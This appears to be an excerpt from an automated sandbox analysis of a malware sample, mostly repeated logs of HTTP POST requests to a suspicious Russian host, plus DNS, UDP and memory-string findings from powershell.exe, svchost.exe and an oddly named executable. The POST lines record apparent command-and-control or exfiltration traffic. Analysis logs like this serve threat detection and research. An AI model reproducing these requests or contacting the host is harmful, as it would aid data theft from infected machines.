                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2076Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2088Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2576Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2076Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2580Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2088Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2076Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2076Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2580Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2076Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2580Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2088Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2580Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2088Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2100Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2076Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 2584Expect: 100-continue
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: global trafficDNS traffic detected: DNS query: 048038cm.renyash.ru
                                    Source: unknownHTTP traffic detected: POST /pipepacketprocessGeneratordownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 048038cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: svchost.exe, 00000032.00000003.1990825251.0000024CA6418000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                                    Source: svchost.exe, 00000032.00000003.1990825251.0000024CA6418000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                                    Source: svchost.exe, 00000032.00000003.1990825251.0000024CA6418000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                                    Source: svchost.exe, 00000032.00000003.1990825251.0000024CA6418000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                                    Source: svchost.exe, 00000032.00000003.1990825251.0000024CA6418000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                                    Source: svchost.exe, 00000032.00000003.1990825251.0000024CA6418000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                                    Source: powershell.exe, 00000024.00000002.2112170584.0000025DD8A46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                    Source: powershell.exe, 00000005.00000002.2041086006.0000026E82976000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2135632693.000002CDC6646000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2202737559.00000250B3E76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1972511544.0000017106117000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2120399113.000001CB20076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2112174865.0000016F53D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2271768418.0000022A47676000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2211838897.00000153B05B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2174593957.000002485ED16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1977884967.0000028C80226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2144215284.0000015F57F18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2203594616.000002544D4F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1981281696.000001B980226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2017656975.000001B4CE958000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2084580351.00000244BCCD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1965392559.0000013C907A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.1985502120.0000028000226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2112170584.0000025DD8A46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                    Source: HyperPortContainerproviderinto.exe, 00000004.00000002.1752671075.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2041086006.0000026E82751000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2135632693.000002CDC6421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2202737559.00000250B3C51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1972511544.0000017105EF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2120399113.000001CB1FE51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2112174865.0000016F53B41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2271768418.0000022A47451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2211838897.00000153B0391000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2174593957.000002485EAF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1977884967.0000028C80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2144215284.0000015F57CF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2203594616.000002544D281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1981281696.000001B980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2017656975.000001B4CE731000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2084580351.00000244BC9F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1965392559.0000013C90581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.1985502120.0000028000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2112170584.0000025DD8832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: powershell.exe, 00000005.00000002.2041086006.0000026E82976000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2135632693.000002CDC6646000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2202737559.00000250B3E76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1972511544.0000017106117000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2120399113.000001CB20076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2112174865.0000016F53D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2271768418.0000022A47676000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2211838897.00000153B05B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2174593957.000002485ED16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1977884967.0000028C80226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2144215284.0000015F57F18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2203594616.000002544D4F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1981281696.000001B980226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2017656975.000001B4CE958000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2084580351.00000244BCCD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1965392559.0000013C907A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.1985502120.0000028000226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2112170584.0000025DD8A46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 